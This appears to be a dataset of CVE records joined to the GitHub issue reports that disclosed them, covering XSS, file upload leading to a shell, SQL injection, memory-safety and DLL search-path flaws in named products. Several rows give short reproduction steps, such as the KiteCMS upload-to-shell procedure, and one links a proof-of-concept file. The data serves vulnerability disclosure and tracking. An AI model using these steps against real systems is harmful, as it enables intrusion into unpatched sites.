[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zblogcn:zblogphp:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56498773-446C-4E07-8133-82E342815799", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "79" ]
79
https://github.com/zblogcn/zblogphp/issues/262
[ "Exploit", "Issue Tracking" ]
github.com
[ "zblogcn", "zblogphp" ]
Click the new module in the module management module, and enter Payload: in the title. Js code inside the module can be executed after saving the module. ![image](https://user-images.githubusercontent.com/65132782/81853624-3cbb6f00-958f-11ea-925b-e342620a0ea6.png)
Module management - new module functionality has storage XSS vulnerabilities
https://api.github.com/repos/zblogcn/zblogphp/issues/262/comments
1
2020-05-13T19:03:10Z
2020-05-14T05:34:08Z
https://github.com/zblogcn/zblogphp/issues/262
617,683,149
262
4,923
CVE-2021-3267
2023-04-04T15:15:08.587
File Upload vulnerability found in KiteCMS v.1.1 allows a remote attacker to execute arbitrary code via the uploadFile function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Kitesky/KiteCMS/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Kitesky/Ki...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kitesky:kitecms:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "206854A6-CDE7-4607-B768-79570E16AE42", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "434" ]
434
https://github.com/Kitesky/KiteCMS/issues/6
[ "Exploit", "Issue Tracking" ]
github.com
[ "Kitesky", "KiteCMS" ]
1. Log in to the website backend url:/index.php/admin/passport/login.html 2. Add php file extension System -> site config -> upload ->image extension ![](https://img.imgdb.cn/item/6007cf573ffa7d37b35676f6.jpg) 3. Upload malicious scripts through the upload interface ![](https://img.imgdb.c...
File upload vulnerability leads to getshell
https://api.github.com/repos/kitesky/KiteCMS/issues/6/comments
0
2021-01-20T08:49:01Z
2021-01-20T08:49:01Z
https://github.com/kitesky/KiteCMS/issues/6
789,771,968
6
4,924
CVE-2023-26733
2023-04-04T15:15:08.940
Buffer Overflow vulnerability found in tinyTIFF v.3.0 allows a local attacker to cause a denial of service via the TinyTiffReader_readNextFrame function in tinytiffreader.c file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/10cksYiqiyinHangzhouTechnology/Security-Issue-Report-of-TinyTIFF/blob/main/README.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinytiff_project:tinytiff:3.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "6431A9DC-17CF-44B2-858F-48734F6BF20E", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "120" ]
120
https://github.com/jkriege2/TinyTIFF/issues/19
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "jkriege2", "TinyTIFF" ]
**Project Address** https://github.com/jkriege2/TinyTIFF **Security Issue Report** A global-buffer-overflow issue was discovered in TinyTIFF in tinytiffreader.c file. The flow allows an attacker to cause a denial of service (abort) via a crafted file. **OS information** ``` ubuntu@ubuntu:~/Documents/Tin...
Security Issue Report
https://api.github.com/repos/jkriege2/TinyTIFF/issues/19/comments
2
2023-02-22T12:32:52Z
2024-04-28T20:37:29Z
https://github.com/jkriege2/TinyTIFF/issues/19
1,595,027,018
19
4,925
CVE-2023-26750
2023-04-04T15:15:08.983
SQL injection vulnerability found in Yii Framework Yii 2 Framework before v.2.0.47 allows the a remote attacker to execute arbitrary code via the runAction function. NOTE: the software maintainer's position is that the vulnerability is in third-party code, not in the framework.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/yiisoft/yii2/issues/19755" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/yiisoft/yii2/issues/19755#issuecomment-1426155955" }, { "source": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*", "matchCriteriaId": "D9E60D1F-4C63-434D-866C-8D1D1E5A5ACD", "versionEndExcluding": null, "versionEndIncluding": "2.0.47", "versionStartExclu...
[ "89" ]
89
https://github.com/yiisoft/yii2/issues/19755
[ "Exploit", "Issue Tracking" ]
github.com
[ "yiisoft", "yii2" ]
**Description** Yii 2 Framework is a project used for PHP application development. Yii versions <= 2.0.47 are susceptible to a SQL injection vulnerability in its "yiibaseController::runAction($route,$params)" function. This vulnerability occurs when parameters received by the affected function are not properly sanit...
Yii 2 <= 2.0.47 SQL Injection Vulnerability
https://api.github.com/repos/yiisoft/yii2/issues/19755/comments
38
2023-02-07T22:37:46Z
2023-08-08T16:50:34Z
https://github.com/yiisoft/yii2/issues/19755
1,575,129,238
19,755
4,926
CVE-2023-26750
2023-04-04T15:15:08.983
SQL injection vulnerability found in Yii Framework Yii 2 Framework before v.2.0.47 allows the a remote attacker to execute arbitrary code via the runAction function. NOTE: the software maintainer's position is that the vulnerability is in third-party code, not in the framework.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/yiisoft/yii2/issues/19755" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/yiisoft/yii2/issues/19755#issuecomment-1426155955" }, { "source": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*", "matchCriteriaId": "D9E60D1F-4C63-434D-866C-8D1D1E5A5ACD", "versionEndExcluding": null, "versionEndIncluding": "2.0.47", "versionStartExclu...
[ "89" ]
89
https://github.com/yiisoft/yii2/issues/19755#issuecomment-1426155955
null
github.com
[ "yiisoft", "yii2" ]
**Description** Yii 2 Framework is a project used for PHP application development. Yii versions <= 2.0.47 are susceptible to a SQL injection vulnerability in its "yiibaseController::runAction($route,$params)" function. This vulnerability occurs when parameters received by the affected function are not properly sanit...
Yii 2 <= 2.0.47 SQL Injection Vulnerability
https://api.github.com/repos/yiisoft/yii2/issues/19755/comments
38
2023-02-07T22:37:46Z
2023-08-08T16:50:34Z
https://github.com/yiisoft/yii2/issues/19755
1,575,129,238
19,755
4,927
CVE-2023-26750
2023-04-04T15:15:08.983
SQL injection vulnerability found in Yii Framework Yii 2 Framework before v.2.0.47 allows the a remote attacker to execute arbitrary code via the runAction function. NOTE: the software maintainer's position is that the vulnerability is in third-party code, not in the framework.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/yiisoft/yii2/issues/19755" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/yiisoft/yii2/issues/19755#issuecomment-1426155955" }, { "source": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*", "matchCriteriaId": "D9E60D1F-4C63-434D-866C-8D1D1E5A5ACD", "versionEndExcluding": null, "versionEndIncluding": "2.0.47", "versionStartExclu...
[ "89" ]
89
https://github.com/yiisoft/yii2/issues/19755#issuecomment-1505390813
null
github.com
[ "yiisoft", "yii2" ]
**Description** Yii 2 Framework is a project used for PHP application development. Yii versions <= 2.0.47 are susceptible to a SQL injection vulnerability in its "yiibaseController::runAction($route,$params)" function. This vulnerability occurs when parameters received by the affected function are not properly sanit...
Yii 2 <= 2.0.47 SQL Injection Vulnerability
https://api.github.com/repos/yiisoft/yii2/issues/19755/comments
38
2023-02-07T22:37:46Z
2023-08-08T16:50:34Z
https://github.com/yiisoft/yii2/issues/19755
1,575,129,238
19,755
4,928
CVE-2023-26750
2023-04-04T15:15:08.983
SQL injection vulnerability found in Yii Framework Yii 2 Framework before v.2.0.47 allows the a remote attacker to execute arbitrary code via the runAction function. NOTE: the software maintainer's position is that the vulnerability is in third-party code, not in the framework.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/yiisoft/yii2/issues/19755" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/yiisoft/yii2/issues/19755#issuecomment-1426155955" }, { "source": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*", "matchCriteriaId": "D9E60D1F-4C63-434D-866C-8D1D1E5A5ACD", "versionEndExcluding": null, "versionEndIncluding": "2.0.47", "versionStartExclu...
[ "89" ]
89
https://github.com/yiisoft/yii2/issues/19755#issuecomment-1505560351
null
github.com
[ "yiisoft", "yii2" ]
**Description** Yii 2 Framework is a project used for PHP application development. Yii versions <= 2.0.47 are susceptible to a SQL injection vulnerability in its "yiibaseController::runAction($route,$params)" function. This vulnerability occurs when parameters received by the affected function are not properly sanit...
Yii 2 <= 2.0.47 SQL Injection Vulnerability
https://api.github.com/repos/yiisoft/yii2/issues/19755/comments
38
2023-02-07T22:37:46Z
2023-08-08T16:50:34Z
https://github.com/yiisoft/yii2/issues/19755
1,575,129,238
19,755
4,929
CVE-2023-26777
2023-04-04T15:15:09.103
Cross Site Scripting vulnerability found in : louislam Uptime Kuma v.1.19.6 and before allows a remote attacker to execute arbitrary commands via the description, title, footer, and incident creation parameter of the status_page.js endpoint.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/171699/Uptime-Kuma-1.19.6-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.c...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uptime_kuma_project:uptime_kuma:*:*:*:*:*:*:*:*", "matchCriteriaId": "02BD1652-2AD6-4EF0-B6C9-A0DBE5DBE0B1", "versionEndExcluding": null, "versionEndIncluding": "1.19.6", "ve...
[ "79" ]
79
https://github.com/louislam/uptime-kuma/issues/2186
[ "Issue Tracking" ]
github.com
[ "louislam", "uptime-kuma" ]
### ⚠️ Please verify that this bug has NOT been raised before. - [X] I checked and didn't find similar issue ### 🛡️ Security Policy - [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy) ### Description Script tag in custom footer text breaks window.prel...
Script tag in Footer Text breaks window.preloadData at Status Page
https://api.github.com/repos/louislam/uptime-kuma/issues/2186/comments
1
2022-10-06T17:20:10Z
2022-10-07T07:02:33Z
https://github.com/louislam/uptime-kuma/issues/2186
1,400,047,253
2,186
4,930
CVE-2023-26991
2023-04-04T15:15:09.183
SWFTools v0.9.2 was discovered to contain a stack-use-after-scope in the swf_ReadSWF2 function in lib/rfxswf.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/196" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "T...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "416" ]
416
https://github.com/matthiaskramm/swftools/issues/196
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
### Env Ubuntu 18.04 clang 11.0 swfdump v0.9.2 a part of Swftools v0.9.2 ### Reproduce POC: [poc](https://github.com/yiliang-neo/POC/raw/main/swfdump/POC-swfdump-use-after-scope.swf) command line: ``` swfdump -D poc ``` ### Debug Info ``` ==13979==ERROR: AddressSanitizer: stack-use-after-scope on addre...
stack-use-after-scope exists in function swf_ReadSWF2 in lib/rfxswf.c
https://api.github.com/repos/swftools/swftools/issues/196/comments
0
2023-02-16T07:45:42Z
2023-03-13T07:41:33Z
https://github.com/swftools/swftools/issues/196
1,587,191,755
196
4,931
CVE-2023-27759
2023-04-04T15:15:09.260
An issue found in Wondershare Technology Co, Ltd Edrawmind v.10.0.6 allows a remote attacker to executea arbitrary commands via the WindowsCodescs.dll file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:edrawmind:10.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "6633FCBB-522B-40A4-9A21-343D97902AEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/8
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27759 Discoverer:Yuan Lirong **Exploit Title:**Wondershare Edrawmind Untrusted Search Path Vulnerability **Date:**2/28/2023 **Vendor Homepage:**https://www.wondershare.com **Software Link:** https://download.edrawsoft.com/inst/edrawmind_setup_full5370.exe **Version:**10.0.6 **Tested on:**Windows 10
Wondershare Edrawmind Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/8/comments
0
2023-02-28T09:26:32Z
2023-04-13T07:51:30Z
https://github.com/liong007/Wondershare/issues/8
1,602,664,733
8
4,932
CVE-2023-27760
2023-04-04T15:15:09.297
An issue found in Wondershare Technology Co, Ltd Filmora v.12.0.9 allows a remote attacker to execute arbitrary commands via the filmora_setup_full846.exe.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:filmora:12.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "9C9B71B6-1D23-417B-A9BE-5CDE818C541B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/9
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27760 Discoverer:Yuan Lirong **Exploit Title:**Wondershare Filmora Untrusted Search Path Vulnerability **Date:**2/28/2023 **Vendor Homepage:**https://www.wondershare.com **Software Link:** https://download.wondershare.com/inst/filmora_setup_full846.exe **Version:**12.0.9 **Tested on:**Windows 10
Wondershare Filmora Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/9/comments
1
2023-02-28T09:30:48Z
2024-12-21T16:17:38Z
https://github.com/liong007/Wondershare/issues/9
1,602,670,965
9
4,933
CVE-2023-27761
2023-04-04T15:15:09.337
An issue found in Wondershare Technology Co., Ltd UniConverter v.14.0.0 allows a remote attacker to execute arbitrary commands via the uniconverter14_64bit_setup_full14204.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:uniconverter:14.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "49F8E9E0-6BAC-4BB3-A747-EC2C2C236DD6", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/1
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27761 Discoverer:Yuan Lirong **Exploit Title:**Wondershare UniConverter Untrusted Search Path Vulnerability **Date:**2/28/2023 **Vendor Homepage:** https://www.wondershare.com **Software Link:** https://download.wondershare.com/inst/uniconverter14_64bit_setup_full14204.exe **Version:** 14.0.0 **Teste...
Wondershare UniConverter Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/1/comments
0
2023-02-28T08:10:01Z
2023-04-13T07:49:25Z
https://github.com/liong007/Wondershare/issues/1
1,602,559,254
1
4,934
CVE-2023-27762
2023-04-04T15:15:09.373
An issue found in Wondershare Technology Co., Ltd DemoCreator v.6.0.0 allows a remote attacker to execute arbitrary commands via the democreator_setup_full7743.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:democreator:6.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "431B11E8-83EB-49F4-B4AC-D3C82EBB1341", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/3
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27762 Discoverer:Yuan Lirong **Exploit Title:**Wondershare DemoCreator Untrusted Search Path Vulnerability **Date:**2/28/2023 **Vendor Homepage:** https://www.wondershare.com **Software Link:** https://download.wondershare.com/inst/democreator_setup_full7743.exe **Version:** 6.0.0 **Tested on:**Windo...
Wondershare DemoCreator Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/3/comments
0
2023-02-28T08:24:11Z
2023-04-13T07:49:57Z
https://github.com/liong007/Wondershare/issues/3
1,602,576,585
3
4,935
CVE-2023-27763
2023-04-04T15:15:09.413
An issue found in Wondershare Technology Co.,Ltd MobileTrans v.4.0.2 allows a remote attacker to execute arbitrary commands via the mobiletrans_setup_full5793.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:mobiletrans:4.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "789C61FF-A3B2-4448-A3AD-302019AFD3DD", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/5
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27763 Discoverer:Yuan Lirong **Exploit Title:**Wondershare MobileTrans Untrusted Search Path Vulnerability **Date:**2/28/2023 **Vendor Homepage:** https://www.wondershare.com **Software Link:** https://download.wondershare.com/inst/mobiletrans_setup_full5793.exe **Version:** 4.0.2 **Tested on:**Windo...
Wondershare MobileTrans Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/5/comments
0
2023-02-28T08:38:07Z
2023-04-13T07:50:38Z
https://github.com/liong007/Wondershare/issues/5
1,602,594,165
5
4,936
CVE-2023-27764
2023-04-04T15:15:09.450
An issue found in Wondershare Technology Co.,Ltd Repairit v.3.5.4 allows a remote attacker to execute arbitrary commands via the repairit_setup_full5913.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:repairit:3.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "27F2C379-DF6C-478D-94F7-09BD9B0EB394", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/4
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27764 Discoverer:Yuan Lirong **Exploit Title:**Wondershare Repairit Untrusted Search Path Vulnerability **Date:**2/28/2023 **Vendor Homepage:** https://www.wondershare.com **Software Link:** https://download.wondershare.com/inst/repairit_setup_full5913.exe **Version:** 3.5.4 **Tested on:**Windows 10 ...
Wondershare Repairit Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/4/comments
0
2023-02-28T08:33:41Z
2023-04-13T07:50:12Z
https://github.com/liong007/Wondershare/issues/4
1,602,588,563
4
4,937
CVE-2023-27765
2023-04-04T15:15:09.490
An issue found in Wondershare Technology Co.,Ltd Recoverit v.10.6.3 allows a remote attacker to execute arbitrary commands via the recoverit_setup_full4134.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:recoverit:10.6.3:*:*:*:*:*:*:*", "matchCriteriaId": "F3909290-98E9-48B9-B435-2893AB84063A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/7
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27765 Discoverer:Yuan Lirong **Exploit Title:**Wondershare Recoverit Untrusted Search Path Vulnerability **Date:**2/28/2023 **Vendor Homepage:** https://www.wondershare.com **Software Link:** https://download.wondershare.com/inst/recoverit_setup_full4134.exe **Version:**10.6.3 **Tested on:**Windows 1...
Wondershare Recoverit Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/7/comments
0
2023-02-28T09:07:00Z
2023-04-13T07:51:15Z
https://github.com/liong007/Wondershare/issues/7
1,602,635,375
7
4,938
CVE-2023-27766
2023-04-04T15:15:09.530
An issue found in Wondershare Technology Co.,Ltd Anireel 1.5.4 allows a remote attacker to execute arbitrary commands via the anireel_setup_full9589.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:anireel:1.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "82B1CEDA-9E43-4C31-A627-BDDEB2587FF5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/2
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27766 Discoverer:Yuan Lirong **Exploit Title:**Wondershare Anireel Untrusted Search Path Vulnerability **Date:**2/28/2023 **Vendor Homepage:** https://www.wondershare.com **Software Link:** https://download.wondershare.com/inst/anireel_setup_full9589.exe **Version:** 1.5.4 Tested on:Windows 10
Wondershare Anireel Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/2/comments
0
2023-02-28T08:16:39Z
2023-04-13T07:49:42Z
https://github.com/liong007/Wondershare/issues/2
1,602,567,253
2
4,939
CVE-2023-27767
2023-04-04T15:15:09.567
An issue found in Wondershare Technology Co.,Ltd Dr.Fone v.12.4.9 allows a remote attacker to execute arbitrary commands via the drfone_setup_full3360.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wondershare:dr.fone:12.4.9:*:*:*:*:*:*:*", "matchCriteriaId": "A27B3A7A-5599-4038-821A-5D4109C37AC5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "426" ]
426
https://github.com/liong007/Wondershare/issues/6
[ "Exploit" ]
github.com
[ "liong007", "Wondershare" ]
CVE-2023-27767 Discoverer:Yuan Lirong **Exploit Title:**Wondershare Dr.Fone Untrusted Search Path Vulnerability **Date:**2/28/2023 **Vendor Homepage:** https://www.wondershare.com **Software Link:** https://download.wondershare.com/inst/drfone_setup_full3360.exe **Version:** 12.4.9 **Tested on:**Windows 10
Wondershare Dr.Fone Untrusted Search Path Vulnerability
https://api.github.com/repos/liong007/Wondershare/issues/6/comments
0
2023-02-28T08:59:23Z
2024-12-15T10:10:52Z
https://github.com/liong007/Wondershare/issues/6
1,602,623,210
6
4,940
CVE-2023-27768
2023-04-04T15:15:09.613
An issue found in Wondershare Technology Co.,Ltd PDFelement v9.1.1 allows a remote attacker to execute arbitrary commands via the pdfelement-pro_setup_full5239.exe file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/liong007/Wondershare/issues/12" } ]
